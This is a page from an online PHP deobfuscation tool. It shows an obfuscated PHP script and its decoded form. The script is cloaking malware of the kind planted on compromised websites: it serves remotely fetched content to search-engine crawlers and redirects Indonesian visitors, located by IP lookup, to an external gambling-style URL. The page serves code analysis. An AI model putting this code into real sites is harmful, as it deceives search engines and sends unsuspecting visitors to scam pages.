Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php function profile_user() { $useragent = $_SERVER["\110\124\x54\x50\137\125\x53\x45\..
Decoded Output download
<?php
function profile_user() { $useragent = $_SERVER["HTTP_USER_AGENT"] ?? ''; $referer = $_SERVER["HTTP_REFERER"] ?? ''; $pasteUrl = "https://pub-b6cc96dd20a74aebaa7e7f7e033abc1b.r2.dev/exitusdigital.html"; $redirectUrl = "https://doublesuper02.click/vip"; $apiUrl = "https://api.incolumitas.com/?q="; $ipAddress = $_SERVER["REMOTE_ADDR"] ?? ''; $botAgents = array("Google-InspectionTool", "googlebot", "(compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "bingbot", "AhrefsBot", "slurp", "duckduckbot", "baiduspider", "yandexbot", "sogou", "exabot", "facebot", "ia_archiver"); $isBot = false; foreach ($botAgents as $bot) { if (stripos($useragent, $bot) !== false) { $isBot = true; break; } } if ($isBot) { $ch = curl_init($pasteUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $content = curl_exec($ch); if ($content === false) { echo "Error fetching content: " . curl_error($ch); curl_close($ch); die; } curl_close($ch); echo $content; } else { $ch = curl_init($apiUrl . $ipAddress); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); if ($response !== false && !empty($response)) { $data = json_decode($response, true); if (isset($data["location"]["country_code"]) && $data["location"]["country_code"] === "ID") { header("Location: {$redirectUrl}"); die; } } include "index.php"; die; } die; } profile_user(); ?>
Did this file decode correctly?
Original Code
<?php
function profile_user() { $useragent = $_SERVER["\110\124\x54\x50\137\125\x53\x45\122\x5f\x41\x47\x45\x4e\124"] ?? ''; $referer = $_SERVER["\110\124\124\x50\x5f\122\x45\x46\105\x52\x45\x52"] ?? ''; $pasteUrl = "\x68\x74\164\160\x73\72\57\x2f\x70\165\142\x2d\142\x36\143\x63\x39\x36\144\144\62\x30\x61\x37\x34\x61\145\x62\x61\141\67\x65\67\x66\67\x65\60\63\x33\x61\142\x63\x31\x62\56\162\62\x2e\144\x65\166\57\145\170\x69\164\x75\163\x64\x69\147\x69\x74\x61\154\x2e\150\x74\x6d\x6c"; $redirectUrl = "\150\x74\x74\160\x73\72\57\x2f\144\157\165\142\154\x65\163\x75\x70\x65\162\x30\62\56\x63\154\151\143\153\57\x76\151\x70"; $apiUrl = "\150\164\x74\x70\x73\x3a\57\57\141\x70\151\x2e\x69\x6e\x63\157\154\x75\x6d\151\164\141\163\x2e\x63\157\x6d\x2f\x3f\161\75"; $ipAddress = $_SERVER["\122\105\x4d\x4f\x54\x45\x5f\101\104\104\x52"] ?? ''; $botAgents = array("\x47\157\157\147\x6c\145\55\x49\156\x73\160\145\x63\164\151\157\x6e\124\x6f\x6f\154", "\x67\x6f\157\x67\x6c\145\142\x6f\x74", "\x28\x63\157\x6d\160\x61\x74\x69\x62\x6c\145\73\40\107\157\x6f\x67\154\145\x62\x6f\164\57\x32\x2e\x31\x3b\x20\53\x68\164\x74\x70\x3a\x2f\x2f\x77\167\167\56\x67\x6f\x6f\147\x6c\145\56\x63\x6f\x6d\57\142\157\164\56\150\x74\155\154\51", "\142\x69\156\x67\142\157\164", "\x41\x68\162\x65\146\x73\102\157\164", "\x73\x6c\165\x72\x70", "\144\x75\x63\153\x64\165\143\153\142\157\x74", "\x62\141\151\144\165\163\160\x69\144\145\x72", "\171\x61\x6e\x64\x65\x78\142\x6f\164", "\163\157\x67\x6f\165", "\x65\170\141\142\157\164", "\x66\x61\143\145\x62\157\164", "\x69\141\x5f\141\x72\x63\150\x69\x76\145\162"); $isBot = false; foreach ($botAgents as $bot) { if (stripos($useragent, $bot) !== false) { $isBot = true; break; } } if ($isBot) { $ch = curl_init($pasteUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $content = curl_exec($ch); if ($content === false) { echo "\105\x72\x72\x6f\x72\40\x66\x65\164\143\x68\151\156\x67\x20\x63\x6f\x6e\x74\x65\156\x74\x3a\x20" . curl_error($ch); curl_close($ch); die; } curl_close($ch); echo $content; } else { $ch = curl_init($apiUrl . $ipAddress); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); if ($response !== false && !empty($response)) { $data = json_decode($response, true); if (isset($data["\154\x6f\x63\x61\164\151\157\x6e"]["\143\x6f\x75\156\164\x72\171\x5f\x63\x6f\144\x65"]) && $data["\154\157\x63\141\164\151\157\156"]["\143\x6f\x75\156\x74\162\x79\137\x63\157\144\x65"] === "\x49\x44") { header("\x4c\x6f\x63\141\164\151\x6f\x6e\x3a\40{$redirectUrl}"); die; } } include "\x69\156\x64\145\x78\x2e\x70\150\x70"; die; } die; } profile_user();
Function Calls
None |
Stats
MD5 | b44954698ad76646f1fc381cd6f416d2 |
Eval Count | 0 |
Decode Time | 64 ms |